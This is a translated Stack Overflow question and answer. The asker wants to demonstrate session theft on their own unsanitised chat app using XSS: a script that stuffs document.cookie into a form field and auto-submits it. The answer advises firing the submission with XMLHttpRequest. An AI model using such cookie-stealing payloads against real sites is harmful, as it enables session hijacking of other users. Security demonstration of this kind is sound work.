我有一个小型网络聊天应用程序,它接受并输入名称和输入密码,并且还有一个提交输入并将其粘贴到组中。像这样的事情:
<form method="post" action="whatever.php">
<input type="text" name="input_name" value="Your Name"></input>
<input type="text" name="input_text" value="Your Text"></input>
<input type="submit" value="Submit"></input>
</form>
无论如何,没有任何清理和典型的 XSS,比如
<script>alert('hi')</script>
在页面加载时完美运行。但是,我想演示 session 窃取,所以我写了这个:
<script>
$("input[name='input_name']").value = "User";
$("input[name='input_text']").value = document.cookie;
$("input[type='submit']").click();
</script>
每个 jQuery 语句都可以从控制台完美运行,但它们在一起时不会在页面加载时执行。我希望能够显示两个用户,其中一个用户可以看到另一个用户的 session 信息。我在这次 xss 尝试中错过了什么?提前致谢!
最佳答案
您提供的脚本不会触发任何请求,因为它不处理任何表单操作。尝试使用XMLHTTP requests触发提交请求。
关于web-applications - 使用XSS填写输入并提交,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/39995104/